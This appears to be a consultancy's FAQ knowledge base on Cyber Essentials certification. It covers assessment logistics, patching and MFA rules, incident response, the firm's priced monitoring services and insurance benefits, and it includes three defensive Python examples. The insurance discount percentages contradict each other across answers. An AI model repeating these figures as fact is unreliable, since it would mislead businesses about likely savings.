When will I know if I've passed?
I'll notify you within 3-5 business days after completing any remediation. If everything passes first time with no non-conformances, typically within 48 hours of the assessment completing. Your IASME certificate is issued digitally and listed on the NCSC's public register.
Keywords: results, pass, IASME certificate, NCSC register | Confidence: 0.95
What if I fail? When can I retake?
You get a detailed non-conformance report specifying which controls didn't meet requirements. Remediate and re-test within the 28-day window at no extra cost. Need to start fresh because of significant infrastructure changes? I'll discuss the best approach with you, and there's no penalty or waiting period.
Keywords: fail, retake, non-conformance, remediation, 28 days | Confidence: 0.95
What if assessment runs over planned time?
I'll finish what needs finishing, and going slightly over doesn't cost extra. If it's running much longer than expected (usually because evidence isn't ready), I'll suggest completing the remaining checks in a follow-up session rather than rushing.
Keywords: assessment overtime, no extra charge, follow-up | Confidence: 0.92
Can I schedule assessment for specific time of day?
Yes, I'll work around your schedule without any issue. Most clients prefer mornings or early afternoons when IT staff are fresh and systems are less busy. Avoid days when you're deploying major updates or running maintenance windows.
Keywords: scheduling, time of day, flexibility | Confidence: 0.92
What if I need to reschedule at short notice?
Contact me immediately if something comes up. Genuine emergencies - illness, system outages, critical business issues - no penalty. Give me as much notice as possible so I can reallocate the slot. These things happen and I understand that.
Keywords: reschedule, short notice, flexibility, no penalty | Confidence: 0.92
Is it worth paying for accelerated assessment scheduling?
Fast Track (12-hour turnaround, £400 premium) is worth it when a contract deadline can't move. Tender closes Friday and you need the certificate by Thursday? The £400 pays for itself instantly through securing the contract. For routine certifications without time pressure, the standard 1-3 day turnaround is fine.
Keywords: Fast Track, accelerated, £400, 12 hours, deadline | Confidence: 0.9
What do organisations with smooth assessments do differently?
Automated patch management that checks daily and applies updates within 14 days. Centralised tools like Intune or NinjaOne so everything's visible in one dashboard. And a dry run a week before, checking all five control areas themselves before I arrive. The common thread: compliance as ongoing operations, not annual panic.
Keywords: smooth assessment, preparation, automated, best practice | Confidence: 0.9
Can I get CE certified during cloud migration?
Yes, but the process is significantly messier than a clean certification. Mid-migration means including both on-premises systems and cloud services in scope - double the evidence gathering, and the same control has to be shown in both places. I'd recommend certifying before migration or after completing it. If timing forces a mid-migration assessment, talk to me about handling the transitional scope.
Keywords: cloud migration, certification timing, scope, transition | Confidence: 0.88
Do social media platforms count?
It depends entirely on how you use them. Browsing LinkedIn or Facebook from personal accounts doesn't bring them in scope. But under Danzell v3.3, if staff log into company social media accounts (a LinkedIn company page, a Twitter/X business account, a Facebook business page), those accounts are in scope. MFA must be enabled where the platform supports it, and those logins belong on your cloud services list.
Keywords: social media, scope, Danzell, LinkedIn, MFA | Confidence: 0.9
How much time should we invest in discovery?
Allow 1-2 weeks before starting your CE application. Small businesses (5-20 people) can usually finish discovery in 2-3 days. Larger organisations with multiple departments and unknown shadow IT may need a full week. The time investment pays off - discovering a forgotten SaaS tool during the assessment is far more disruptive than finding it beforehand.
Keywords: discovery time, inventory, preparation timeline | Confidence: 0.88
What's the final check before assessment?
48 hours before assessment, verify: all devices patched within 14 days (check Windows Update and third-party software), MFA enabled on every cloud account, firewall enabled on all devices, malware protection active and updated, admin accounts separate from daily-use accounts, and you can log into every admin portal you need to show me. If anything fails this check, you've still got time to fix it.
Keywords: final check, pre-assessment, 48 hours, checklist | Confidence: 0.92
Why do I need compliance monitoring after getting CE certified?
CE certification lasts 12 months but compliance can drift within days if nobody's watching. Staff install unauthorised software, new devices get added without proper configuration, patches slip past the 14-day window, people leave with admin accounts still active. By month six, you could be non-compliant without knowing it. I see this pattern constantly during renewal assessments.
Keywords: compliance drift, monitoring, 12 months, renewal | Confidence: 0.9
What's the most common compliance failure between assessments?
Patch management, hands down, is the most common failure. Organisations fail to keep patches within the 14-day window, especially for third-party software such as Adobe, Java, browsers, and PDF readers. Windows and macOS auto-updates help but don't cover everything. By renewal time, devices are three months behind on patches with nobody noticing. It happens more often than you'd think.
Keywords: compliance failure, patching, 14-day, third-party software | Confidence: 0.92
Is compliance monitoring expensive to implement?
Cheaper than failing renewal by a significant margin. Our Cyber 365 Patching service is £8/device/month and handles automated patch management with compliance tracking. If you're already using Microsoft 365 Business Premium, Intune provides basic monitoring at no extra cost. Even a simple spreadsheet tracking patch dates and MFA status, reviewed weekly, is better than nothing.
Keywords: monitoring cost, Cyber 365, patching, £8/device, Intune | Confidence: 0.9
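The spreadsheet review described above is easy to automate once the sheet has consistent columns. The following Python is an added example written for this page, not a Net Sec Group tool: it runs the weekly drift check over two constructed CSV exports (a device list and a cloud-account list; every device, account, service and date in them is made up) and maps each problem to the CE control it belongs to. The column names and the `review_devices`, `review_accounts`, `review` and `by_control` functions are my own choices, not anything from Intune or another product.

```python
"""Weekly CE drift review over device and account inventories.
Added example: the CSV text, devices, accounts and dates are constructed sample data."""
import csv
import io
from collections import Counter
from datetime import date

PATCH_WINDOW_DAYS = 14
REVIEWED_ON = date(2025, 11, 20)

# Constructed device export: pending_update_released is the release date of the
# oldest update still not installed (blank when nothing is pending).
DEVICES_CSV = """device,owner,os_supported,pending_update_released,firewall_on,av_active
LAPTOP-01,alice,yes,,yes,yes
LAPTOP-02,bob,yes,2025-10-25,yes,yes
LAPTOP-03,carol,no,,yes,no
SRV-01,it,yes,2025-11-15,no,yes
"""

# Constructed cloud-account export, one row per account per service.
ACCOUNTS_CSV = """account,service,role,mfa_on,daily_use,owner_status
alice@example.test,Microsoft 365,user,yes,yes,active
bob-admin@example.test,Microsoft 365,admin,yes,yes,active
dave@example.test,Xero,user,no,yes,active
erin-admin@example.test,Entra ID,admin,yes,no,leaver
"""


def _rows(csv_text: str) -> list[dict]:
    return list(csv.DictReader(io.StringIO(csv_text)))


def _finding(subject: str, control: str, detail: str) -> dict:
    return {"subject": subject, "control": control, "detail": detail}


def review_devices(csv_text: str, reviewed_on: date) -> list[dict]:
    """Patch age, supported OS, firewall and malware protection per device."""
    findings = []
    for d in _rows(csv_text):
        name = d["device"]
        if d["os_supported"] != "yes":
            findings.append(_finding(name, "security updates", "unsupported OS, no patches available"))
        if d["pending_update_released"]:
            released = date.fromisoformat(d["pending_update_released"])
            age = (reviewed_on - released).days
            if age > PATCH_WINDOW_DAYS:
                findings.append(_finding(name, "security updates",
                                         f"update pending {age} days (limit {PATCH_WINDOW_DAYS})"))
        if d["firewall_on"] != "yes":
            findings.append(_finding(name, "firewalls", "host firewall disabled"))
        if d["av_active"] != "yes":
            findings.append(_finding(name, "malware protection", "malware protection not active"))
    return findings


def review_accounts(csv_text: str) -> list[dict]:
    """MFA, admin/daily-use separation and leavers per cloud account."""
    findings = []
    for a in _rows(csv_text):
        name = f'{a["account"]} ({a["service"]})'
        if a["mfa_on"] != "yes":
            findings.append(_finding(name, "access control", "MFA not enabled"))
        if a["role"] == "admin" and a["daily_use"] == "yes":
            findings.append(_finding(name, "access control", "admin account used for daily work"))
        if a["owner_status"] == "leaver":
            findings.append(_finding(name, "access control", "account still active after owner left"))
    return findings


def review(devices_csv: str, accounts_csv: str, reviewed_on: date) -> list[dict]:
    """All open drift issues across both inventories."""
    return review_devices(devices_csv, reviewed_on) + review_accounts(accounts_csv)


def by_control(findings: list[dict]) -> dict:
    """Count of open issues per CE control, for the weekly summary."""
    return dict(Counter(f["control"] for f in findings))


if __name__ == "__main__":
    for f in review(DEVICES_CSV, ACCOUNTS_CSV, REVIEWED_ON):
        print(f'{f["control"]:<18} {f["subject"]:<36} {f["detail"]}')
    print(by_control(review(DEVICES_CSV, ACCOUNTS_CSV, REVIEWED_ON)))
```

Run weekly against fresh exports and keep the output: a dated series of empty (or shrinking) findings lists is exactly the continuous-compliance evidence the answers above say assessors and insurers want to see.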
Does Net Sec Group provide compliance monitoring services?
Yes. Patching (£8/device/month) monitors and enforces the 14-day requirement. EDR + Patching (£15/device/month) adds threat detection with automated isolation. Vulnerability Scanning (from £2.50/agent/month) provides continuous scanning. All services include reporting that maps directly to CE control areas.
Keywords: Cyber 365, monitoring service, patching, EDR, pricing | Confidence: 0.9
Should I provide laptops to contractors?
For contractors working more than three months or needing admin access, yes. Full control over security configuration, patches and malware protection, and it's straightforward to demonstrate compliance during assessment. For short-term contractors working under a month, MDM on their personal device or restricting them to a virtual desktop may be more practical.
Keywords: contractor laptop, company device, MDM, virtual desktop | Confidence: 0.9
I just discovered hidden contractors before my assessment. What do I do?
Contact me immediately to discuss the situation. Two options: postpone the assessment while you bring contractor devices up to CE standard (proper patching, MFA, malware protection), or restructure access so those contractors genuinely don't touch your in-scope systems. Don't try to hide them - if I discover unmanaged contractor access during the screenshare, it's a fail.
Keywords: hidden contractors, last-minute, assessment, postpone | Confidence: 0.9
How quickly must I respond to maintain CE compliance?
CE doesn't specify incident response timeframes, but if an incident compromises your CE controls you need to act fast. Compromised admin credentials or disabled malware protection? Immediate response is required, within hours at most. A phishing attempt that didn't succeed is lower priority. A breach involving personal data that is likely to put people at risk starts a 72-hour clock for notifying the ICO, counted from when you become aware of it.
Keywords: response time, incident, CE compliance, ICO, 72 hours | Confidence: 0.88
How do I preserve digital evidence during response?
Don't power off affected systems - you'll lose RAM contents (running processes, encryption keys, active network connections). Disconnect from the network instead and take screenshots of error messages, malware alerts and unusual processes. Save system logs before they rotate because law enforcement and insurers want this evidence intact.
Keywords: digital evidence, forensics, don't power off, network disconnect | Confidence: 0.88
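Saving logs is only useful if you can later show they haven't changed since collection. The following Python is an added example, not a Net Sec Group procedure or any forensic tool's code: it reads nothing from a real host but builds a hash manifest over an evidence folder (who collected it, when, and the SHA-256, size and timestamp of each file) and re-verifies it, so a tampered or missing file shows up. The two sample log lines, the detection name in them and the `build_manifest`, `verify_manifest` and `demo` functions are constructed for illustration.

```python
"""Hash manifest for preserved evidence files.
Added example: the two log files and their contents are constructed in a
temporary directory; nothing here touches a real system's logs."""
import hashlib
import json
import os
import tempfile
from datetime import datetime, timezone


def sha256_file(path: str) -> str:
    """Stream the file so large logs don't have to fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 20), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(root: str, collector: str) -> dict:
    """Record size, mtime and SHA-256 of every file under root, plus who collected it and when."""
    files = {}
    for dirpath, _, names in os.walk(root):
        for name in sorted(names):
            path = os.path.join(dirpath, name)
            st = os.stat(path)
            files[os.path.relpath(path, root)] = {
                "sha256": sha256_file(path),
                "size": st.st_size,
                "mtime_utc": datetime.fromtimestamp(st.st_mtime, timezone.utc).isoformat(),
            }
    return {"collected_by": collector,
            "collected_at_utc": datetime.now(timezone.utc).isoformat(),
            "files": files}


def verify_manifest(manifest: dict, root: str) -> list[str]:
    """Names of files that are missing or whose hash no longer matches the manifest."""
    problems = []
    for rel, meta in manifest["files"].items():
        path = os.path.join(root, rel)
        if not os.path.isfile(path) or sha256_file(path) != meta["sha256"]:
            problems.append(rel)
    return problems


def demo() -> dict:
    """Constructed walk-through: preserve two sample logs, verify, then detect tampering."""
    with tempfile.TemporaryDirectory() as root:
        evidence = os.path.join(root, "evidence")
        os.makedirs(evidence)
        with open(os.path.join(evidence, "auth.log"), "w") as fh:
            fh.write("Nov 20 08:12:01 fileserver sshd[418]: Failed password for admin from 203.0.113.7\n")
        with open(os.path.join(evidence, "av_alert.txt"), "w") as fh:
            fh.write("2025-11-20T08:14:09Z quarantine Ransom.Generic C:\\Users\\bob\\invoice.exe\n")
        manifest = build_manifest(evidence, collector="it-oncall")
        # Keep the manifest outside the tree it describes so it never hashes itself.
        with open(os.path.join(root, "manifest.json"), "w") as fh:
            json.dump(manifest, fh, indent=2)
        clean = verify_manifest(manifest, evidence)
        with open(os.path.join(evidence, "auth.log"), "a") as fh:
            fh.write("edited after collection\n")
        tampered = verify_manifest(manifest, evidence)
    return {"files": sorted(manifest["files"]), "clean": clean, "tampered": tampered}


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

Copy logs out with the manifest written at collection time, store the manifest somewhere the affected system can't reach, and hand both to whoever needs the evidence; re-running the verify step on receipt is how they confirm nothing changed in transit.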
What should I tell management during active incidents?
Provide clear, factual updates without technical jargon. Focus on business impact: what's affected, who's impacted, what decisions they need to make (authorise system shutdowns, approve customer notifications, engage legal counsel). Update every 2-4 hours during active incidents, even if the update is 'no change, still investigating.' Don't speculate about cause until you know.
Keywords: management communication, incident updates, business impact | Confidence: 0.88
What are most common lessons learned from CE incidents?
The patterns I see in incidents involving CE-certified businesses: patching was actually behind schedule despite claims otherwise, MFA gaps on forgotten cloud services, admin accounts being used for daily work (violating separation), staff who didn't know who to contact, backup recovery never tested. Almost always the same story: 'we thought we were compliant but hadn't actually checked recently.'
Keywords: lessons learned, incidents, patching, MFA gaps, admin accounts | Confidence: 0.88
What's the biggest incident response mistake?
Delaying containment while trying to investigate the cause. When you discover a security incident, isolate affected systems immediately. Don't spend hours trying to understand what happened before disconnecting the compromised device. Contain the threat first and investigate second. Every minute of delay during active malware spread or data exfiltration increases the damage.
Keywords: incident mistake, containment, delay, isolate first | Confidence: 0.92
Is the discount automatic when I get certified?
No, you must notify your insurer and provide your CE certificate yourself. Contact your broker directly, send the IASME certificate PDF, include your policy number, ask them to note the certification on your file. Some insurers apply mid-term adjustments while others note it for your next renewal.
Keywords: insurance discount, notification, IASME certificate, broker | Confidence: 0.88
Which insurance policies benefit from CE certification?
Cyber and data breach insurance benefits most directly. Professional indemnity sometimes offers small reductions (5-10%) because CE reduces data breach risk. Directors and officers liability can benefit if cyber risk is a board concern. General business insurance rarely offers CE-specific discounts, but some underwriters factor it into overall risk scoring.
Keywords: insurance policies, cyber insurance, professional indemnity, D&O | Confidence: 0.85
When should I contact insurers about CE certification?
The day you receive your certificate is the ideal time. If you're shopping for new insurance, provide the certificate during quoting to get the best rates upfront. If you're mid-policy, notify your broker immediately so they can note it for renewal or request a mid-term adjustment. Don't wait until renewal - you'll miss months of potential savings.
Keywords: insurer contact, timing, renewal, mid-term adjustment | Confidence: 0.88
How quickly can I get premium reductions after certification?
New policies: discount applies immediately if you provide the CE certificate during quoting. Existing policies: most insurers note it for your next renewal (could be months away). Some apply mid-term adjustments within 2-4 weeks. Ask your broker specifically whether a mid-term change is possible.
Keywords: premium reduction, timing, mid-term, renewal | Confidence: 0.85
How do I maintain insurance benefits long-term?
Never let your CE certificate expire between renewal periods. If it lapses, insurers may revoke your discount - some may increase your premium at renewal. Renew at least one month before expiry so there's no gap. Keep your insurer updated on security improvements (EDR deployment, incident response plan) and maintain incident-free claims history for the strongest renewal terms.
Keywords: maintain insurance, CE renewal, certificate expiry, long-term | Confidence: 0.85
What's the best update strategy for Mac environments?
If you have under 20 Macs in your estate, enable automatic updates on each machine (System Settings, General, Software Update) and check weekly that nothing's pending past 14 days. Larger deployments need MDM to push updates centrally and track compliance. Apple doesn't publish CVSS scores, so treat all security updates as high priority and apply within 14 days.
Keywords: macOS updates, strategy, automatic updates, MDM, 14-day | Confidence: 0.88
Are Macs worth the compliance effort?
Macs are often easier to certify than Windows. Consistent built-in security: XProtect for malware, Gatekeeper for app control, a built-in application firewall, FileVault for encryption. Two of those need switching on: the firewall is off by default on a fresh macOS install, and FileVault is optional until you enable it, so check both before assessment day. The effort is proving compliance to an assessor, which requires either MDM (for CE Plus evidence) or manual verification of each machine. If you're already on Microsoft 365, Intune manages Macs alongside your Windows devices.
Keywords: Mac compliance, XProtect, Gatekeeper, Intune, effort | Confidence: 0.88
What's the difference between 'recommended' and 'required' for MFA under Danzell?
Until April 2026, MFA is required for admin and privileged accounts on cloud services and recommended for everyone else. From April 2026 under Danzell v3.3, MFA becomes required for all cloud service accounts where the service supports it - admin and standard users alike. If you're preparing now, treat it as required already: you need it before April 2026 anyway, and a certificate issued under the old rule still has to survive your next renewal.
Keywords: MFA, recommended vs required, Danzell, April 2026, timeline | Confidence: 0.95
How long does MDM deployment take?
Small businesses (10-20 devices): allow 1-2 weeks. MDM platform setup takes a couple of days, policy configuration another 2-3 days, then pilot testing before full rollout. 50+ devices: allow 3-4 weeks to account for testing across device types and troubleshooting edge cases. User enrolment itself takes 15-30 minutes per device.
Keywords: MDM deployment, timeline, enrollment, rollout | Confidence: 0.88
What happens if vulnerabilities are found during scanning?
It depends on the severity of the findings and how long the fix has been available. Critical (CVSS 9.0+) and high (CVSS 7.0-8.9) vulnerabilities fail if the patch has been available for more than 14 days; a critical finding whose fix came out last week is a 'fix it before the deadline', not a fail. Findings below 7.0 that the vendor hasn't rated critical or high don't fail CE on their own, though you should still fix them. You get a remediation report detailing each finding, and you've got 28 days to fix the issues and request re-scanning. Most vulnerabilities I find are missing patches that can be applied quickly.
Keywords: vulnerability scanning, findings, remediation, CVSS, 28 days | Confidence: 0.9
What about systems that require scheduled downtime for patching?
You still need critical and high-risk patches applied within 14 days, even if the system requires a maintenance window. Weekly maintenance windows give you sufficient buffer (the longest a fix waits is six days), but monthly windows simply do not: a fix released the day after a window waits about four weeks. If a system genuinely can't be patched within 14 days due to operational requirements, document why and talk to me about your options. CE has no mechanism for accepting compensating controls in place of a missing patch, so in practice that means an out-of-band window for the fix or moving the system into an isolated sub-set.
Keywords: scheduled downtime, patching, 14-day, maintenance window | Confidence: 0.9
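The two answers above (scan findings and maintenance windows) come down to one rule: a fix for a vulnerability that is CVSS 7.0 or above, that the vendor rates critical or high, or that carries no severity information at all must be installed within 14 days of release. The following Python is an added example written for this page, not code from Net Sec Group or from any scanning product it mentions. It applies that rule to a constructed list of findings (the host names, product names and 'vuln-A' style labels are made up, not real scan output or CVE identifiers) and then checks whether a repeating maintenance window can meet the deadline. The `Finding` class and the `ce_patch_required`, `evaluate`, `scan_passes`, `next_window`, `window_meets_deadline` and `worst_case_delay` functions are mine.

```python
"""CE patching rule over scan findings and maintenance-window cadence.
Added example: hosts, products and 'vuln-X' labels below are constructed, not scan output."""
from dataclasses import dataclass
from datetime import date, timedelta
from typing import Optional

PATCH_WINDOW_DAYS = 14   # CE: critical/high fixes installed within 14 days of release
CVSS_THRESHOLD = 7.0     # CE: CVSS v3 base score of 7.0 or above counts as high


@dataclass(frozen=True)
class Finding:
    host: str
    product: str
    ref: str                        # constructed label, not a real CVE
    cvss: Optional[float]           # None when no score is published
    vendor_severity: Optional[str]  # vendor's own rating, if any
    patch_released: Optional[date]  # None when no fix exists (unsupported software)


def ce_patch_required(f: Finding) -> bool:
    """The 14-day rule applies when the vendor rates the fix critical or high,
    the CVSS v3 base score is 7.0 or more, or no severity information exists."""
    if f.vendor_severity and f.vendor_severity.lower() in {"critical", "high"}:
        return True
    if f.cvss is not None:
        return f.cvss >= CVSS_THRESHOLD
    return True  # unknown severity: assume the worst, as the scheme does


def evaluate(f: Finding, assessed_on: date) -> dict:
    """Classify one finding as it would be judged on assessment day."""
    if not ce_patch_required(f):
        return {"host": f.host, "ref": f.ref, "status": "below_threshold"}
    if f.patch_released is None:
        # No fix will ever arrive: isolate the device in a sub-set or replace the software.
        return {"host": f.host, "ref": f.ref, "status": "fail_unsupported"}
    due_by = f.patch_released + timedelta(days=PATCH_WINDOW_DAYS)
    status = "fail" if assessed_on > due_by else "due"
    return {"host": f.host, "ref": f.ref, "status": status,
            "days_open": (assessed_on - f.patch_released).days, "due_by": due_by}


def scan_passes(findings, assessed_on: date) -> bool:
    """CE Plus scan verdict: any 'fail*' status fails the whole scan."""
    return not any(evaluate(f, assessed_on)["status"].startswith("fail") for f in findings)


def next_window(released: date, anchor: date, cadence_days: int) -> date:
    """First maintenance window on or after `released`; windows repeat every
    cadence_days starting from `anchor` (a past window date)."""
    if released <= anchor:
        return anchor
    periods = -(-(released - anchor).days // cadence_days)  # ceiling division
    return anchor + timedelta(days=periods * cadence_days)


def window_meets_deadline(released: date, anchor: date, cadence_days: int) -> bool:
    """True when the next scheduled window falls inside the 14-day deadline."""
    deadline = released + timedelta(days=PATCH_WINDOW_DAYS)
    return next_window(released, anchor, cadence_days) <= deadline


def worst_case_delay(cadence_days: int) -> int:
    """Longest wait for a window: the fix lands the day after one, so cadence - 1 days."""
    return cadence_days - 1


# Constructed sample scan output, assessed on 20 November 2025.
ASSESSED_ON = date(2025, 11, 20)
WINDOW_ANCHOR = date(2025, 11, 2)  # a past Sunday maintenance window
SAMPLE = [
    Finding("LAPTOP-07", "Adobe Acrobat Reader", "vuln-A", 9.8, "critical", date(2025, 10, 20)),
    Finding("LAPTOP-12", "Google Chrome", "vuln-B", 7.5, "high", date(2025, 11, 10)),
    Finding("SRV-FILE01", "Windows Server 2022", "vuln-C", 5.3, "medium", date(2025, 10, 1)),
    Finding("LAPTOP-03", "Java Runtime", "vuln-D", None, None, date(2025, 10, 1)),
    Finding("RECEPTION-PC", "Windows 10 22H2 (no ESU)", "vuln-E", 8.8, "high", None),
]

if __name__ == "__main__":
    for finding in SAMPLE:
        print(evaluate(finding, ASSESSED_ON))
    print("scan passes:", scan_passes(SAMPLE, ASSESSED_ON))
    for cadence in (7, 30):
        ok = worst_case_delay(cadence) <= PATCH_WINDOW_DAYS
        print(f"window every {cadence} days: worst case {worst_case_delay(cadence)} days, meets rule: {ok}")
```

Two design points worth noting: a finding with no score and no vendor rating is treated as in scope rather than ignored, because the scheme's rule is to patch when severity is unknown; and software with no fix at all is reported as its own failure class, since the remedy there is isolation or replacement, not waiting for a window.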
How long does Windows 11 migration take?
Small businesses with 10-25 devices should allow 2-4 weeks. Medium businesses with 25-100 devices should allow 4-8 weeks. That covers hardware assessment, procurement of replacement machines, Windows 11 deployment, data migration and user setup. Hardware procurement is the bottleneck (2-3 weeks lead time), not the migration work itself. Start planning at least 3 months before you need it done.
Keywords: Windows 11 migration, timeline, deployment, procurement | Confidence: 0.85
It's September 2025 and I haven't started. What do I do?
You've got 4-6 weeks before Windows 10 end-of-life. Triage the situation immediately by running PC Health Check across all devices to identify which can upgrade in-place (do those first, quickest option). For incompatible machines that can't upgrade, order replacements now - hardware lead times eat into your window. If replacements can't arrive in time, consider Microsoft's Extended Security Updates (paid, buys you time) or moving those devices off-scope temporarily.
Keywords: emergency, September 2025, Windows 10 EOL, triage, ESU | Confidence: 0.88
How long does EDR deployment take?
For a typical SME with 10-50 devices, allow 1-2 weeks. Day one: console setup and policy configuration. Day two: pilot deployment on 5-10 devices to verify no conflicts. Days 3-5: roll out to remaining devices. Week two: tune alert thresholds and resolve false positives. Our Cyber 365 EDR deployment is managed by me, so your IT team's involvement is minimal.
Keywords: EDR deployment, timeline, 1-2 weeks, pilot, rollout | Confidence: 0.88
Should we manage EDR internally or use managed services?
Managed EDR makes sense for most SMEs. Managing it internally requires dedicated security staff with expertise in threat analysis, 24/7 monitoring, and time to investigate alerts. If you have no dedicated security team (and most SMEs don't), managed EDR solves that problem entirely. Managed EDR gives you professional monitoring without the headcount. Our Cyber 365 service (£15/device/month) includes full management - you don't touch the console.
Keywords: managed EDR, internal vs managed, SOC, Cyber 365 | Confidence: 0.88
How quickly can Net Sec Group deploy EDR?
Week one: discovery call to understand your environment, then I configure the EDR console and deploy agents to a pilot group. Week two: full rollout to all devices with policy tuning. Most businesses fully protected within 10-14 days. If there's an active threat or urgent deadline, emergency deployment in 48-72 hours with a compressed pilot phase.
Keywords: Net Sec Group, EDR deployment, 10-14 days, emergency | Confidence: 0.88
CE vs CE Plus
How much preparation time do I really need?
The assessment itself takes 2-4 hours, but preparation varies depending on how compliant you already are. If your patch management is solid and MFA is enabled everywhere, a week of evidence gathering is enough. Starting from scratch on controls like admin account separation or firewall rules? Allow 4-6 weeks of preparation and remediation time. The biggest time sink is usually discovering cloud services you didn't know staff were using.
Keywords: preparation time, CE Plus, assessment, timeline | Confidence: 0.92
What's the best remote access method for assessments?
I use Microsoft Teams for CE Plus assessments - simple and most businesses already have it. Make sure you've got a stable internet connection and test screen sharing beforehand. I'll need you to share your screen while navigating admin portals, so dual monitors help if you've got them.
Keywords: remote access, Teams, screen sharing, CE Plus | Confidence: 0.95
Do I need all systems accessible during assessment?
All in-scope systems must be accessible during CE Plus: workstations, servers, firewalls, cloud admin consoles, and any mobile devices I need to check. If a system is genuinely offline (hardware failure), I'll work around it by checking another device of the same type. But if you can't access a key admin portal because you forgot the password, that delays everything.
Keywords: system access, assessment, admin portal, CE Plus | Confidence: 0.92
Do you charge extra for assessment preparation?
No, preparation support is included in all packages. For standard CE (£320-£600 for Basic, from £1,200 for Plus), I'll guide you through remediation if issues are found and re-test at no extra cost. I support you until you pass with no charge per attempt.
Keywords: preparation cost, included, remediation, re-test, pricing | Confidence: 0.95
What's the biggest mistake that causes assessment delays?
Not patching properly is the biggest cause. Most organisations rely on Windows auto-updates, which aren't enough for third-party software like Adobe, Java or non-Microsoft browsers. The 14-day window for critical/high-risk patches catches most businesses out. Second biggest: forgetting MFA on some cloud services, especially the ones you don't think about. Accounting software and domain registrars are the usual culprits. I see it every week during assessments.
Keywords: assessment delay, patching, 14-day, MFA, third-party software | Confidence: 0.95
What's the difference between Azure AD security defaults and conditional access?
Security Defaults is free and needs no configuration: every user must register for MFA with the Microsoft Authenticator app, administrators are always challenged, other users are challenged when the sign-in warrants it, and legacy authentication protocols that can't do MFA are blocked. Simple, and it works for most small businesses. Conditional Access (requires Entra ID P1, included in Microsoft 365 Business Premium) lets you create rules: require MFA only from outside the office, block sign-ins from certain countries, require compliant devices. For CE, Security Defaults meets the requirement. Conditional Access gives you more control but isn't mandatory. Whichever you use, be ready to show me the sign-in log with an entry where MFA was actually satisfied, not just the policy toggle.
Keywords: Security Defaults, Conditional Access, Entra ID, MFA, Microsoft 365 | Confidence: 0.9
Do "managed by someone else" services still count?
Yes, if business data goes into it, it's in your CE scope regardless of who manages it. Website hosted by an agency, cloud backup managed by your IT provider, email hosted by a third party, SaaS apps procured by individual departments. You need to either demonstrate the controls yourself or get documented evidence from whoever manages the service.
Keywords: managed services, third party, scope, responsibility | Confidence: 0.92
What information do assessors need for each service?
For each cloud service in scope, I need the service name (e.g. 'Microsoft 365', 'Xero'), what you use it for (e.g. 'email and file storage', 'accounting'), and during CE Plus, admin access to show me the MFA and user settings. A simple spreadsheet listing all your cloud services with these details speeds up the assessment.
Keywords: cloud services, service list, assessment evidence, admin access | Confidence: 0.92
Do all cloud services need MFA enabled?
From April 2026 under Danzell v3.3, yes. MFA mandatory on all cloud service accounts (admin and standard users) where the service supports it. Until then, only required on admin accounts. The MFA must use a separate device or app, not just SMS to the same phone. If a cloud service genuinely doesn't support MFA, document it. Most modern services support MFA now so this is rarely an issue.
Keywords: MFA, cloud services, Danzell, mandatory, April 2026 | Confidence: 0.95
What compliance reports do I need for CE renewal?
For CE Basic renewal, just resubmit a fresh questionnaire because no formal reports are needed. CE Plus renewal: have patch compliance reports showing 14-day installation rates, MFA configuration evidence for all cloud services, firewall rule documentation, user access control lists showing separate admin accounts, malware protection status across all devices. Most of this comes straight from your admin portals on the day.
Keywords: renewal, compliance reports, evidence, CE Plus, CE Basic | Confidence: 0.9
What's included in your monitoring service?
Patching (£8/device/month) handles automated patch deployment with compliance tracking against the 14-day requirement. EDR + Patching (£15/device/month) adds endpoint protection with 24/7 automated threat isolation. Vulnerability Scanning (from £2.50/agent/month) provides continuous scanning with prioritised remediation guidance. All services include compliance reporting you can use as CE assessment evidence.
Keywords: Cyber 365, monitoring, patching, EDR, pricing | Confidence: 0.9
What's the biggest contractor compliance mistake?
Not including contractors in CE scope at all. I regularly see organisations fail CE Plus because they didn't realise contractors' devices were in scope. Second biggest mistake: assuming contractors handle their own security. They might handle security, but you need evidence proving it. Under Danzell, any device accessing organisational data is in scope. That includes every contractor laptop and phone.
Keywords: contractor, scope, compliance mistake, Danzell, BYOD | Confidence: 0.92
How much can Cyber Essentials reduce my insurance premiums?
Typical reductions: 5-15% for CE Basic, 10-25% for CE Plus. Some insurers go higher (up to 30%) if you combine CE Plus with documented incident response procedures and continuous monitoring. The exact discount depends on your insurer, your sector and the rest of your security posture. Ask your broker what discount they can get with CE certification.
Keywords: insurance, premium reduction, discount, CE Basic, CE Plus | Confidence: 0.85
Do all insurers offer discounts for CE certification?
Not all, but most major UK cyber insurance providers do. CFC, Coalition, Hiscox, AXA and Beazley typically recognise CE certification. Discounts vary between providers, so get quotes from at least three. Some won't offer a specific CE discount but factor it into their overall risk assessment, which still reduces your premium.
Keywords: insurers, discount, CFC, Coalition, Hiscox, CE certification | Confidence: 0.85
How do I maximise insurance discounts from CE certification?
Get CE Plus rather than Basic - typically qualifies for double the discount. Tell your insurer proactively rather than waiting for renewal. Combine CE with other controls (EDR deployment, documented incident response plan) for additional reductions. Some insurers offer a further 5-10% if you can demonstrate continuous compliance monitoring rather than point-in-time certification.
Keywords: maximise discount, CE Plus, insurance, continuous monitoring | Confidence: 0.85
What evidence do insurers want beyond the CE certificate?
Most accept the CE certificate itself, issued by IASME. Some ask additional questions about security practices beyond the five CE controls - backup procedures, incident response plans, staff training records. CE Plus gives insurers more confidence than self-assessed CE Basic. The technical verification carries more weight with underwriters than self-assessment alone.
Keywords: insurance evidence, IASME certificate, security questionnaire | Confidence: 0.85
Should I consider CE Plus for additional insurance benefits?
CE Plus typically delivers 15-25% premium discounts versus 5-10% for CE Basic, which often justifies the price difference. On a £5,000 annual cyber insurance policy, the extra £500 to £800 for CE Plus could save £500 to £750 annually in premiums alone, before counting better coverage limits, lower deductibles and faster claims processing.
Keywords: CE Plus, insurance benefits, premium discount, ROI | Confidence: 0.85
What's the biggest mistake in CE insurance integration?
Getting certified but never telling your insurer. I see this problem constantly where a business spends £1,500 on CE Plus, qualifies for a 20% discount, but doesn't notify their insurer until renewal six months later, and loses six months of potential savings in the process. Contact your insurer the day you receive your certificate. Some apply the discount mid-term, others note it for renewal.
Keywords: insurance mistake, notification, insurer, discount timing | Confidence: 0.9
What's the best insurance result you've seen from CE certification?
